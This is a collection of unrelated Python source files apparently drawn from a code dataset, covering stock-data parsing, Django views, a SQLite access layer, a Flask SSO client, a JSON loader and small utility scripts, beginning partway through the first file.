'Earnings Growth',\n\t\t\t\t\t\t\t\t 'Revenue Growth',\n\t\t\t\t\t\t\t\t 'Total Cash',\n\t\t\t\t\t\t\t\t 'Total Cash Per Share',\n\t\t\t\t\t\t\t\t 'Total Debt',\n\t\t\t\t\t\t\t\t 'Current Ratio',\n\t\t\t\t\t\t\t\t 'Book Value Per Share',\n\t\t\t\t\t\t\t\t 'Cash Flow',\n\t\t\t\t\t\t\t\t 'Beta',\n\t\t\t\t\t\t\t\t 'Held by Insiders',\n\t\t\t\t\t\t\t\t 'Held by Institutions',\n\t\t\t\t\t\t\t\t 'Shares Short (as of',\n\t\t\t\t\t\t\t\t 'Short Ratio',\n\t\t\t\t\t\t\t\t 'Short % of Float',\n\t\t\t\t\t\t\t\t 'Shares Short (prior ', \n\t\t\t\t\t\t\t\t ##############\n\t\t\t\t\t\t\t\t 'Status'])\n\tsp500_df = pd.read_csv(\"SP500SampleData.csv\") #Downloaded SP500 data from Quandl into Dataframe\n\tstock_df = pd.read_csv(\"stock_prices2.csv\")\n\tticker_list = []\n\n\tfor each_dir in stock_list[1:]: #stocks 1 to all\n\t\teach_file = os.listdir(each_dir)\n\t\tticker = each_dir.split(\"_KeyStats\\\\\")[1]\n\t\tticker_list.append(ticker)\n\n\t\t# starting_stock_value = False\n\t\t# starting_sp500_value = False\n\n\t\tif len(each_file) > 0: #makes sure there is data\n\t\t\tfor file in each_file:\n\t\t\t\tdate_stamp = datetime.strptime(file, '%Y%m%d%H%M%S.html')\n\t\t\t\tunix_time = time.mktime(date_stamp.timetuple())\n\t\t\t\tfull_file_path = each_dir+'/'+file\n\t\t\t\tsource = open(full_file_path,'r').read()\n\t\t\t\ttry:\n\t\t\t\t\tvalue_list = []\n\n\t\t\t\t\tfor each_data in gather:\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tregex = re.escape(each_data) + r'.*?(\\d{1,8}\\.\\d{1,8}K?M?B?|N/A)%?'\n\t\t\t\t\t\t\tvalue = re.search(regex, source)\n\t\t\t\t\t\t\tvalue = (value.group(1))\n\n\t\t\t\t\t\t\tif \"B\" in value:\n\t\t\t\t\t\t\t\tvalue = float(value.replace(\"B\",''))*1000000000\n\t\t\t\t\t\t\telif \"M\" in value:\n\t\t\t\t\t\t\t\tvalue = float(value.replace(\"M\",''))*1000000\n\t\t\t\t\t\t\telif \"K\" in value:\n\t\t\t\t\t\t\t\tvalue = float(value.replace(\"K\",''))*1000\n\n\t\t\t\t\t\t\tvalue_list.append(value)\n\t\t\t\t\t\texcept Exception as e:\n\t\t\t\t\t\t\tvalue = \"N/A\"\n\t\t\t\t\t\t\tvalue_list.append(value)\n\t\t\t\t\ttry:\n\t\t\t\t\t\tsp500_date = datetime.fromtimestamp(unix_time).strftime('%Y-%m-%d')\n\t\t\t\t\t\trow = sp500_df[sp500_df[\"Date\"] == sp500_date]\n\t\t\t\t\t\tsp500_value = float(row[\"Adj Close\"])\n\t\t\t\t\texcept:\n\t\t\t\t\t\tsp500_date = datetime.fromtimestamp(unix_time-259200).strftime('%Y-%m-%d')\n\t\t\t\t\t\trow = sp500_df[sp500_df[\"Date\"] == sp500_date]\n\t\t\t\t\t\tsp500_value = float(row[\"Adj Close\"])\n\n\t\t\t\t\tone_year_later = int(unix_time + 31536000)\n\t\t\t\t\ttry:\n\t\t\t\t\t\tsp500_1y = datetime.fromtimestamp(one_year_later).strftime('%Y-%m-%d')\n\t\t\t\t\t\trow = sp500_df[sp500_df[\"Date\"] == sp500_1y]\n\t\t\t\t\t\tsp500_1y_value = float(row[\"Adj Close\"])\n\t\t\t\t\texcept Exception as e:\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tsp500_1y = datetime.fromtimestamp(one_year_later - 259200).strftime('%Y-%m-%d')\n\t\t\t\t\t\t\trow = sp500_df[sp500_df[\"Date\"] == sp500_1y]\n\t\t\t\t\t\t\tsp500_1y_value = float(row[\"Adj Close\"])\n\t\t\t\t\t\texcept Exception as e:\n\t\t\t\t\t\t\tprint(\"S&P 500 exception\", str(e))\n\n\n\t\t\t\t\ttry:\n\t\t\t\t\t\tstock_price_1y = datetime.fromtimestamp(one_year_later).strftime('%Y-%m-%d')\n\t\t\t\t\t\trow = stock_df[stock_df[\"Date\"] == stock_price_1y][ticker.upper()]\n\t\t\t\t\t\tstock_1y_value = round(float(row),2)\n\t\t\t\t\texcept Exception as e:\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tstock_price_1y = datetime.fromtimestamp(one_year_later - 259200).strftime('%Y-%m-%d')\n\t\t\t\t\t\t\trow = stock_df[stock_df[\"Date\"] == stock_price_1y][ticker.upper()]\n\t\t\t\t\t\t\tstock_1y_value = round(float(row),2)\n\t\t\t\t\t\texcept Exception as e:\n\t\t\t\t\t\t\tprint(\"stock price exception\", str(e))\n\t\t\t\t\t\t\tpass\n\n\t\t\t\t\ttry:\n\t\t\t\t\t\tstock_price = datetime.fromtimestamp(unix_time).strftime('%Y-%m-%d')\n\t\t\t\t\t\trow = stock_df[stock_df[\"Date\"] == stock_price][ticker.upper()]\n\t\t\t\t\t\tstock_price = round(float(row),2)\n\t\t\t\t\texcept Exception as e:\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tstock_price = datetime.fromtimestamp(unix_time - 259200).strftime('%Y-%m-%d')\n\t\t\t\t\t\t\trow = stock_df[stock_df[\"Date\"] == stock_price][ticker.upper()]\n\t\t\t\t\t\t\tstock_price = round(float(row),2)\n\t\t\t\t\t\texcept Exception as e:\n\t\t\t\t\t\t\tprint(\"stock price exception:\", str(e))\n\t\t\t\t\t\t\tpass\n\n\n\t\t\t\t\tstock_p_change = round(((stock_price_1y - stock_price) / stock_price * 100),2)\n\t\t\t\t\tsp500_p_change = round(((sp500_1y_value - sp500_value) / sp500_value * 100),2)\n\t\t\t\t\tdifference = stock_p_change - sp500_p_change\n\n\t\t\t\t\tif difference > 0:\n\t\t\t\t\t\tstatus = \"outperform\"\n\t\t\t\t\telse:\n\t\t\t\t\t\tstatus = \"underperform\"\n\n\t\t\t\t\tif value_list.count(\"N/A\") > 0:\n\t\t\t\t\t\tpass\n\t\t\t\t\telse:\n\t\t\t\t\t\tdf = df.append({'Date':date_stamp,\n\t\t\t\t\t\t\t\t\t\t\t'Unix':unix_time,\n\t\t\t\t\t\t\t\t\t\t\t'Ticker':ticker,\n\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\t\t'Price':stock_price,\n\t\t\t\t\t\t\t\t\t\t\t'stock_p_change':stock_p_change,\n\t\t\t\t\t\t\t\t\t\t\t'SP500':sp500_value,\n\t\t\t\t\t\t\t\t\t\t\t'sp500_p_change':sp500_p_change,\n\t\t\t\t\t\t\t\t\t\t\t'Difference':difference,\n\t\t\t\t\t\t\t\t\t\t\t'DE Ratio':value_list[0],\n\t\t\t\t\t\t\t\t\t\t\t#'Market Cap':value_list[1],\n\t\t\t\t\t\t\t\t\t\t\t'Trailing P/E':value_list[1],\n\t\t\t\t\t\t\t\t\t\t\t'Price/Sales':value_list[2],\n\t\t\t\t\t\t\t\t\t\t\t'Price/Book':value_list[3],\n\t\t\t\t\t\t\t\t\t\t\t'Profit Margin':value_list[4],\n\t\t\t\t\t\t\t\t\t\t\t'Operating Margin':value_list[5],\n\t\t\t\t\t\t\t\t\t\t\t'Return on Assets':value_list[6],\n\t\t\t\t\t\t\t\t\t\t\t'Return on Equity':value_list[7],\n\t\t\t\t\t\t\t\t\t\t\t'Revenue Per Share':value_list[8],\n\t\t\t\t\t\t\t\t\t\t\t'Market Cap':value_list[9],\n\t\t\t\t\t\t\t\t\t\t\t 'Enterprise Value':value_list[10],\n\t\t\t\t\t\t\t\t\t\t\t 'Forward P/E':value_list[11],\n\t\t\t\t\t\t\t\t\t\t\t 'PEG Ratio':value_list[12],\n\t\t\t\t\t\t\t\t\t\t\t 'Enterprise Value/Revenue':value_list[13],\n\t\t\t\t\t\t\t\t\t\t\t 'Enterprise Value/EBITDA':value_list[14],\n\t\t\t\t\t\t\t\t\t\t\t 'Revenue':value_list[15],\n\t\t\t\t\t\t\t\t\t\t\t 'Gross Profit':value_list[16],\n\t\t\t\t\t\t\t\t\t\t\t 'EBITDA':value_list[17],\n\t\t\t\t\t\t\t\t\t\t\t 'Net Income Avl to Common ':value_list[18],\n\t\t\t\t\t\t\t\t\t\t\t 'Diluted EPS':value_list[19],\n\t\t\t\t\t\t\t\t\t\t\t 'Earnings Growth':value_list[20],\n\t\t\t\t\t\t\t\t\t\t\t 'Revenue Growth':value_list[21],\n\t\t\t\t\t\t\t\t\t\t\t 'Total Cash':value_list[22],\n\t\t\t\t\t\t\t\t\t\t\t 'Total Cash Per Share':value_list[23],\n\t\t\t\t\t\t\t\t\t\t\t 'Total Debt':value_list[24],\n\t\t\t\t\t\t\t\t\t\t\t 'Current Ratio':value_list[25],\n\t\t\t\t\t\t\t\t\t\t\t 'Book Value Per Share':value_list[26],\n\t\t\t\t\t\t\t\t\t\t\t 'Cash Flow':value_list[27],\n\t\t\t\t\t\t\t\t\t\t\t 'Beta':value_list[28],\n\t\t\t\t\t\t\t\t\t\t\t 'Held by Insiders':value_list[29],\n\t\t\t\t\t\t\t\t\t\t\t 'Held by Institutions':value_list[30],\n\t\t\t\t\t\t\t\t\t\t\t 'Shares Short (as of':value_list[31],\n\t\t\t\t\t\t\t\t\t\t\t 'Short Ratio':value_list[32],\n\t\t\t\t\t\t\t\t\t\t\t 'Short % of Float':value_list[33],\n\t\t\t\t\t\t\t\t\t\t\t 'Shares Short (prior ':value_list[34],\n\t\t\t\t\t\t\t\t\t\t\t'Status':status},\n\t\t\t\t\t\t\t\t\t\t ignore_index=True)\n\t\t\t\t#exception in case some data is missing or not a float\n\t\t\t\texcept Exception as e:\n\t\t\t\t\tpass\n\t# for each_ticker in ticker_list:\n\t# \ttry:\n\t# \t\tplot_df = df[(df['Ticker'] == each_ticker)]\n\t# \t\tplot_df = plot_df.set_index(['Date']) \n\n\t# \t\tif plot_df['Status'][-1] == \"underperform\":\n\t# \t\t\tcolor = 'r'\n\t# \t\telse:\n\t# \t\t\tcolor = 'g'\n\t# \t\tplot_df['Difference'].plot(label = each_ticker, color = color)\n\t# \t\tplt.legend()\n\t# \texcept:\n\t# \t\tpass\n\t# plt.show()\n\t#Save output to CSV\n\tdf.to_csv(\"key_stats_acc_perf_NO_NA.csv\")\n\n\t\t\t\n\nKey_Stats()\n","sub_path":"DataParse.py","file_name":"DataParse.py","file_ext":"py","file_size_in_byte":8648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"649418660","text":"from output import Op\nfrom serialize import AbstractJsonSerialable\nfrom stat_classes import Stat\nfrom utilities import choose\nfrom abc import abstractmethod\n\nclass AbstractCustomizable(AbstractJsonSerialable):\n nextId = 0\n \"\"\"\n Required kwargs:\n - type : str\n - name : str\n - customizationPoints : int (defaults to 0)\n - stats : dict{ str : int } this currently must be handled by subclasses\n \"\"\"\n def __init__(self, **kwargs):\n super(AbstractCustomizable, self).__init__(**kwargs)\n self.name = kwargs[\"name\"]\n self.type = kwargs[\"type\"]\n self.customizationPoints = kwargs.get(\"customizationPoints\", 0)\n self.id = AbstractCustomizable.nextId\n # Key: attr name, value: Stat.\n # attributes which to player can customize.\n self.stats = {}\n #for k, v in kwargs[\"stats\"].items():\n # self.addStat(k, v)\n AbstractCustomizable.nextId += 1\n self.user = None\n self.addSerializedAttributes(\n \"name\",\n \"customizationPoints\",\n \"stats\"\n )\n\n #def addStat(self, name, base):\n # self.stats[name.lower()] = Stat(name, base)\n def addStat(self, stat):\n self.stats[stat.name.lower()] = stat\n\n \"\"\"\n Re-sets a stat's base calculation value\n \"\"\"\n def setStatBase(self, statName: str, newBase: int):\n self.stats[statName.lower()].set_base(newBase)\n\n def getStatValue(self, statName: str)->float:\n return self.stats[statName.lower()].get()\n\n def setUser(self, user):\n self.user = user\n\n def __str__(self):\n return self.name\n\n # more or less a replacement for AbstractUpgradable.getDisplayData()\n def getStatDisplayList(self)->list:\n ret = [\"{0}'s stats:\".format(self.name)]\n for k, v in self.stats.items():\n ret.append(\"\\t{0}: {1}\".format(k, str(v.get())))\n return ret\n\n \"\"\"\n Provides a menu, so the player can customize this\n \"\"\"\n def customizeMenu(self):\n done = False\n while not done and self.customizationPoints > 0:\n Op.add(self.getStatDisplayList())\n Op.display()\n exit = \"Save changes and exit\"\n options = [exit]\n canIncrease = []\n canDecrease = []\n for statName, stat in self.stats.items():\n if not stat.is_max():\n canIncrease.append(statName)\n if not stat.is_min():\n canDecrease.append(statName)\n options.extend(canIncrease) # choose stat to increase first\n options.reverse()\n\n increaseMe = choose(\"Which stat do you want to increase?\", options)\n if increaseMe == exit:\n done = True\n else:\n options = [exit]\n for statName in canDecrease:\n if statName != increaseMe:\n options.append(statName)\n options.reverse()\n\n decreaseMe = choose(\"Which stat do you want to decrease?\", options)\n if decreaseMe == exit:\n done = True\n else:\n self.setStatBase(increaseMe, self.stats[increaseMe].get_base() + 1)\n self.setStatBase(decreaseMe, self.stats[decreaseMe].get_base() - 1)\n self.calcStats()\n self.customizationPoints -= 1\n\n @abstractmethod\n def getDisplayData(self)->list:\n pass\n\n def displayData(self):\n Op.add(self.getDisplayData())\n Op.display()\n\n \"\"\"\n Calculates all this' stats\n \"\"\"\n def calcStats(self):\n for stat in self.stats.values():\n stat.reset_boosts()\n stat.calc()\n","sub_path":"characters/customizable.py","file_name":"customizable.py","file_ext":"py","file_size_in_byte":3757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"627820123","text":"def kthSmallest(self, root, k):\n count = []\n self.helper(root, count)\n return count[k-1]\n \ndef helper(self, node, count):\n if not node:\n return\n \n self.helper(node.left, count)\n count.append(node.val)\n self.helper(node.right, count)\n","sub_path":"二叉树/230.kthsmallestinBST.py","file_name":"230.kthsmallestinBST.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"650116033","text":"#!/usr/bin/env python3\n\"\"\"Toggle xfce4-panel, invoked via 3-finger swipe up using Gester.\"\"\"\n\nimport subprocess\n\n\ndef is_panel_running():\n p = [\"pidof\", \"xfce4-panel\"]\n result = subprocess.run(p,\n stdout=subprocess.PIPE)\n # '' if not running, else the process id\n return result.stdout.decode('utf-8')\n\n\nif is_panel_running():\n subprocess.run(\"xfce4-panel -q &\", shell=True)\nelse:\n subprocess.run(\"xfce4-panel -d &\", shell=True)\n","sub_path":".config/i3/toggle_xfce4-panel.py","file_name":"toggle_xfce4-panel.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"7354533","text":"from django.shortcuts import render, get_object_or_404, render_to_response\n#from django.http import HttpResponse\n# Import template loader \n# Import Album from models for conecting databasee\nfrom .models import Album, Song\nfrom django.template import RequestContext\n\n# Create your views here.\n\ndef index(request):\n #return HttpResponse(\"

This is Music app home page.

\")\n #Get the all objects from Album\n all_albums = Album.objects.all()\n #Create variable with name html and return that variable.\n \n #In following you don't need to give directory name as templates, as it's already taken care\n #by django framework, so don't need to give path such as, 'templates/music/index.html'\n context = {'all_albums': all_albums} \n #Following line renders, index.html and pass context (passes dictionary data) . \n #return HttpResponse(template.render(context, request))\n return render(request, 'music/index.html', context)\n #Instead of context you can directly write code e.g. {'all_albums': all_albums}\n #E.g. return render(request, 'music/index.html', {'all_albums': all_albums} )\ndef detail(request, album_id):\n #Example of Http404 Error\n #album = Album.objects.get(pk=album_id)\n try: \n album = get_object_or_404(Album, pk=album_id) \n \n return render(request, 'music/detail.html', {'album': album})\n except Exception as e:\n return render(request, 'music/404.html')\n \n \ndef favorite(request, album_id):\n album = get_object_or_404(Album, pk=album_id)\n try:\n selected_song = album.song_set.get(pk=request.POST['song'])\n except (KeyError, Song.DoesNotExist):\n return render(request, 'music/detail.html', {\n 'album': album,\n 'error_message': \"You didn't selected valid song\",\n })\n else:\n selected_song.is_favorite = True\n selected_song.save()\n return render(request, 'music/detail.html', {'album': album})\n\n# --------------------Error handling------------------#############\n#def custom_404(request):\n# return render(request, 'musci/404.html', {}, status=404)\n\ndef handler404(request):\n #response = render_to_response('music/404.html')\n #response.status_code = 404\n #return response\n return render(request, 'music/404.html')\n\n\ndef handler500(request):\n #response = render_to_response('music/500.html') \n #response.status_code = 500\n #return response\n return render(request, 'music/500.html')\n","sub_path":"website/music/views_example_customError_Page404.py","file_name":"views_example_customError_Page404.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"119281968","text":"import sqlite3\nimport datetime,time\nimport sha\n\ndef hash_password(password):\n return sha.sha(password).hexdigest()\ndef convert_date(date_string):\n if not date_string:\n return None\n return datetime.datetime.strptime(date_string, \"%Y-%m-%dT%H:%M:%S.%f\")\ndef dict_factory(cursor, row):\n d = {}\n for idx, col in enumerate(cursor.description):\n d[col[0]] = row[idx]\n return d\nclass DB:\n def __init__(self):\n self.opened = False\n def open(self):\n if not self.opened:\n self.conn = sqlite3.connect('data/metainfo.db',\n detect_types=sqlite3.PARSE_DECLTYPES|sqlite3.PARSE_COLNAMES)\n self.conn.row_factory = dict_factory\n self.opened = True\n def close(self):\n if self.opened:\n self.conn.commit()\n self.conn.close()\n self.opened = False\n def get_cursor(self):\n if not self.opened:\n self.open()\n return self.conn.cursor()\n def hash_password(self, password):\n return hash_password(password)\n # Users\n def make_user(self, row):\n if row:\n return {'user_id': int(row['id']),\n '_id': row['id'],\n 'username': row['username'],\n 'password': row['password'],\n 'email': row['email'],\n 'profile': row['profile'],\n 'confirmed': row['confirmed'] == 1,\n 'regdate': convert_date(row['regdate']) }\n return None\n def username_exists(self, username):\n return self.get_user_ic(username) != None\n def get_user_by_id(self, user_id):\n if user_id == None:\n return None\n try:\n self.open()\n rows = self.conn.execute(\"select * from users where id = ?\", [int(user_id)])\n for row in rows:\n return self.make_user(row)\n return None\n finally:\n self.close()\n def get_user_ic(self, username):\n try:\n self.open()\n rows = self.conn.execute(\"select * from users where username = ?\", [username])\n for row in rows:\n return self.make_user(row)\n return None\n finally:\n self.close()\n def add_user(self, user):\n try:\n self.open()\n values = [user['username'],\n user['password'],\n user['email'],\n user['profile'],\n user['confirmed'],\n user['regdate']]\n c = self.conn.cursor()\n res = c.execute(\"\"\"insert into users (username, password, email, \n profile, confirmed, regdate)\n values (?, ?, ?, ?, ?, ?)\"\"\", values)\n c.close()\n return res\n finally:\n self.close()\n def verify_user(self, username, password):\n user = self.get_user_ic(username)\n if not user:\n return False\n return user['password'] == hash_password(password)\n # Samples\n def make_sample(self, row):\n if row:\n return {'id': int(row['id']),\n '_id': row['id'],\n 'name': row['name'],\n 'game': row['game'],\n 'instrument': row['instrument'] }\n return None\n def add_sample(self, **kargs):\n try:\n self.open()\n values = [kargs['name'], kargs['game'], kargs['instrument']]\n return self.conn.execute(\"\"\"insert into samples (name, game, instrument)\n values(?,?,?)\"\"\", values)\n finally:\n self.close()\n def get_sample(self, name):\n try:\n self.open()\n rows = self.conn.execute(\"select * from samples where name = ?\", [name])\n for row in rows:\n return self.make_sample(row)\n finally:\n self.close()\n def get_sample_games(self):\n try:\n self.open()\n rows = self.conn.execute(\"select distinct game from samples\")\n games = [row['game'] for row in rows]\n return games\n finally:\n self.close()\n def get_sample_instruments(self):\n try:\n self.open()\n rows = self.conn.execute(\"select distinct instrument from samples\")\n instruments = [row['instrument'] for row in rows]\n return instruments\n finally:\n self.close()\n def get_samples(self, games=[], instruments=[]):\n try:\n self.open()\n samples = []\n for game in games:\n rows = self.conn.execute(\"select * from samples where game = ?\", [game])\n samples += [self.make_sample(row) for row in rows]\n for instrument in instruments:\n rows = self.conn.execute(\"select * from samples where instrument = ?\", [instrument])\n samples += [self.make_sample(row) for row in rows]\n if (not games) and (not instruments):\n rows = self.conn.execute(\"select * from samples\")\n samples = [self.make_sample(row) for row in rows]\n return samples\n finally:\n self.close()\n # Tracks\n def count_tracks(self, artist=None, finished=False):\n try:\n self.open()\n if artist:\n rows = self.conn.execute(\"\"\"SELECT count(*) as count from tracks\n where artist = ?\"\"\", [artist])\n else: \n rows = self.conn.execute(\"\"\"SELECT count(*) as count from tracks\n where finished = ?\"\"\", [int(finished)])\n for row in rows:\n return int(row['count'])\n finally:\n self.close()\n def get_tracks(self, offset=0, limit=20, order='date', artist=None, finished=False):\n try:\n self.open()\n rows = []\n if artist:\n rows = self.conn.execute(\"\"\"SELECT * from tracks where \n artist = ?\n ORDER BY last_modified DESC LIMIT ?,?\"\"\", \n [artist, offset, limit])\n elif finished:\n rows = self.conn.execute(\"\"\"SELECT * from tracks where finished = ?\n ORDER BY last_finished DESC LIMIT ?,?\"\"\", \n [int(finished), offset, limit])\n else:\n rows = self.conn.execute(\"\"\"SELECT * from tracks where finished = ?\n ORDER BY last_modified DESC LIMIT ?,?\"\"\", \n [int(finished), offset, limit])\n tracks = [dict(row) for row in rows]\n for track in tracks:\n track['date'] = convert_date(track['date'])\n track['last_modified'] = convert_date(track['last_modified'])\n track['last_finished'] = convert_date(track['last_finished'])\n return tracks\n finally:\n self.close()\n def get_track(self, track_id):\n try:\n self.open()\n if type(track_id) == type(1) or len(track_id) < 10:\n track_id = int(track_id)\n rows = self.conn.execute(\"\"\"SELECT * from tracks where id = ?\"\"\",\n [track_id])\n else:\n rows = self.conn.execute(\"\"\"SELECT * from tracks where bid = ?\"\"\",\n [track_id])\n track = {}\n for row in rows:\n track = dict(row)\n return track\n finally:\n self.close()\n def remove_track(self, track_id):\n try:\n self.open()\n self.conn.execute(\"DELETE from tracks where id = ?\",\n [track_id])\n self.conn.execute(\"DELETE from comments where track_id = ?\",\n [track_id])\n finally:\n self.close()\n def create_track(self, track):\n try:\n self.open()\n c = self.conn.cursor()\n c.execute(\"\"\"INSERT into tracks (title, artist, body, date, last_modified, finished)\n values (?,?,?,?,?,0)\"\"\",\n [track['title'], track['artist'], track['body'],\n datetime.datetime.now().isoformat(),\n datetime.datetime.now().isoformat()])\n tid = c.lastrowid\n return tid\n finally:\n c.close()\n self.close()\n def update_track(self, track_id, track):\n try:\n self.open()\n self.conn.execute(\"\"\"UPDATE tracks \n set title = ?,\n artist = ?,\n date = ?,\n last_modified = ?,\n last_finished = ?,\n body = ?,\n finished = ?\n where id = ?\"\"\",\n [track['title'],\n track['artist'],\n track['date'],\n track['last_modified'],\n track['last_finished'],\n track['body'],\n track['finished'],\n int(track_id)])\n finally:\n self.close()\n # Comments\n def get_comments(self, track_id):\n try:\n self.open()\n rows = self.conn.execute(\"SELECT * from comments where track_id = ?\", [track_id])\n comments = [dict(row) for row in rows]\n for comment in comments:\n comment['date'] = convert_date(comment['date'])\n return comments\n finally:\n self.close()\n def add_comment(self, track_id, comment):\n try:\n self.open()\n self.conn.execute(\"\"\"INSERT into comments (track_id, author, \n message, date) VALUES(?,?,?,?)\"\"\",\n [track_id, comment['author'], comment['message'], comment['date']])\n finally:\n self.close()\n def get_recent_comments(self, user):\n try:\n self.open()\n rows = self.conn.execute(\"\"\"SELECT tracks.id as track_id, \n tracks.title as track_title,\n comments.author as author, \n comments.message as message,\n comments.date as date\n FROM tracks, comments\n WHERE tracks.artist = ?\n AND tracks.id = comments.track_id\n ORDER BY comments.date DESC\n LIMIT 0,30\"\"\",\n [user])\n return [dict(row) for row in rows]\n finally:\n self.close()\n\n","sub_path":"mmlsharedb_sqlite.py","file_name":"mmlsharedb_sqlite.py","file_ext":"py","file_size_in_byte":10019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"523826495","text":"from urllib.parse import urlencode, urljoin\n\nimport flask\n\nimport requests\n\napp = flask.Flask(__name__)\n\nAUTHORIZE_URL = 'http://127.0.0.1:5000/sso/authorize'\nEXCHANGE_TOKEN_URL = 'http://127.0.0.1:5000/sso/exchange_token'\nAPI_PROFILE_URL = 'http://127.0.0.1:5000/api/user/profile'\nAPP_ID = 'TESTAPP'\nAPP_SECRET = 'APPSECRET'\n\n\n@app.route('/')\ndef index():\n qs = urlencode({\n 'app_id': APP_ID,\n 'redirect_uri': flask.url_for('callback', _external=True),\n 'scope': 'read,write',\n })\n auth_url = '%s?%s' % (AUTHORIZE_URL, qs)\n\n access_token = flask.request.cookies.get('access_token')\n if not access_token:\n return 'Authorize' % auth_url\n else:\n headers = {'Authorization': access_token}\n r = requests.get(API_PROFILE_URL, headers=headers)\n body = r.json()\n if r.status_code != 200:\n return '''\n Authorization failed(Reason: %s) Authorize\n ''' % (body['error_msg'], auth_url)\n\n return 'Hello, %s! Logout' % (\n body['user_name'], flask.url_for('logout'))\n\n\n@app.route('/logout')\ndef logout():\n resp = flask.make_response(flask.redirect(flask.url_for('index')))\n resp.set_cookie('access_token', '', expires=0)\n return resp\n\n\n@app.route('/sso/callback')\ndef callback():\n auth_token = flask.request.args.get('auth_token')\n data = {\n 'app_secret': APP_SECRET,\n 'auth_token': auth_token,\n }\n r = requests.post(EXCHANGE_TOKEN_URL, data=data)\n body = r.json()\n if r.status_code != 200:\n return 'Authorization failed(Reason: %s)' % body['error_msg'], 400\n\n resp = flask.make_response(flask.redirect(flask.url_for('index')))\n resp.set_cookie('access_token', body['access_token'], httponly=True)\n\n return resp\n","sub_path":"client/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"467743578","text":"# Copyright (c) 2015 Riverbed Technology, Inc.\n#\n# This software is licensed under the terms and conditions of the MIT License\n# accompanying the software (\"License\"). This software is distributed \"AS IS\"\n# as set forth in the License.\n\nimport json\nfrom collections import OrderedDict\n\nfrom yaml.error import Mark\nfrom json.scanner import py_make_scanner\nimport json.decoder\n\nfrom reschema.loader_nodes import ordered_dict_node, list_node, unicode_node\n\n\ndef linecol(doc, pos):\n # assume zero-indexed\n lineno = doc.count('\\n', 0, pos)\n if lineno == 0:\n colno = pos - 1\n else:\n colno = pos - doc.rindex('\\n', 0, pos) - 1\n return lineno, colno\n\n\nclass Decoder(json.decoder.JSONDecoder):\n def __init__(self, name=\"\", *args, **kwargs):\n super(Decoder, self).__init__(*args, **kwargs)\n\n def wrap_obj_parser(parser, node_type):\n def internal(o_and_start, *args, **kwargs):\n o, start = o_and_start\n r, end = parser(o_and_start, *args, **kwargs)\n\n start_line, start_col = linecol(o, start)\n end_line, end_col = linecol(o, end)\n start_mark = Mark(name, start, start_line, start_col, o, start)\n end_mark = Mark(name, end, end_line, end_col, o, start)\n\n return node_type(r, start_mark, end_mark), end\n return internal\n\n def wrap_parser(parser, node_type):\n def internal(o, start, *args, **kwargs):\n r, end = parser(o, start, *args, **kwargs)\n\n start_line, start_col = linecol(o, start)\n end_line, end_col = linecol(o, end)\n start_mark = Mark(name, start, start_line, start_col, o, start)\n end_mark = Mark(name, end, end_line, end_col, o, start)\n\n return node_type(r, start_mark, end_mark), end\n return internal\n\n self.parse_string = wrap_parser(self.parse_string, unicode_node)\n self.parse_array = wrap_obj_parser(self.parse_array, list_node)\n self.parse_object = wrap_obj_parser(self.parse_object,\n ordered_dict_node)\n\n # Not thread safe, but need to patch this for loading marks onto object\n # keys.\n json.decoder.scanstring = self.parse_string\n\n # Need to hook the python scanner because the C scanner doesn't have\n # a hookable method to parse_string.\n self.scan_once = py_make_scanner(self)\n\n\ndef marked_load(stream):\n return json.load(stream, cls=Decoder, name=stream.name)\n\n\ndef clean_load(stream):\n return json.load(stream, object_pairs_hook=OrderedDict)\n","sub_path":"reschema/json_loader.py","file_name":"json_loader.py","file_ext":"py","file_size_in_byte":2657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"280093253","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author : DTennant(dtennant.github.io)\n\"\"\"\nimport webbrowser,urllib,urllib2,sys\nfrom bs4 import BeautifulSoup\n\ndef handle_error(word):\n\tprint(word)\n\ndef browser_get_result(url):\n\twebbrowser.open_new_tab(url)\n\ndef usage():\n\tprint('''\n\t\tUsage:\n\t\t\tPydu.py keyword\n\t\t''')\n\ndef main():\n\ttry:\n\t\tkeyword = str(sys.argv[1])\n\t\tres_num = int(raw_input(\"\\nEnter The number of the results you want to search:\\n\"))\n\t\tres = urllib2.urlopen('http://www.baidu.com/s?' + urllib.urlencode({'wd': keyword}))\n\t\thtml = res.read()\n\t\tsoup = BeautifulSoup(html,'lxml')\n\t\tsearch_res = soup.find_all('div',class_ = 'result c-container ',limit = res_num)\n\t\tfor index in range(res_num):\n\t\t\tprint('search_res ready to load')\n\t\t\ttemp = search_res[index]\n\t\t\tprint('search_res readed')\n\t\t\tprint('Result No.' + str(index + 1) + ':\\n')\n\t\t\tprint('\\t' + temp.find('a').renderContents() + '\\n')\n\t\t\ta_click = temp.find('div',class_ = 'c-abstract')\n\t\t\tprint('\\t' + str(a_click.renderContents()) + '\\n')\n\n\t\tchoice = int(raw_input('\\nEnter The index of which result you want read(0 to quit):\\n'))\n\t\tif choice == 0:\n\t\t\texit()\n\t\tbrowser_get_result(str(search_res[choice - 1].find('a').get('href')))\n\n\texcept IndexError:\n\t\tusage()\n\texcept urllib2.URLError:\n\t\thandle_error('\\nCan\\'t connect the Internet,Please check the connect\\n')\n\nif __name__ == '__main__':\n\tmain()","sub_path":"Pydu/Pydu.py","file_name":"Pydu.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} 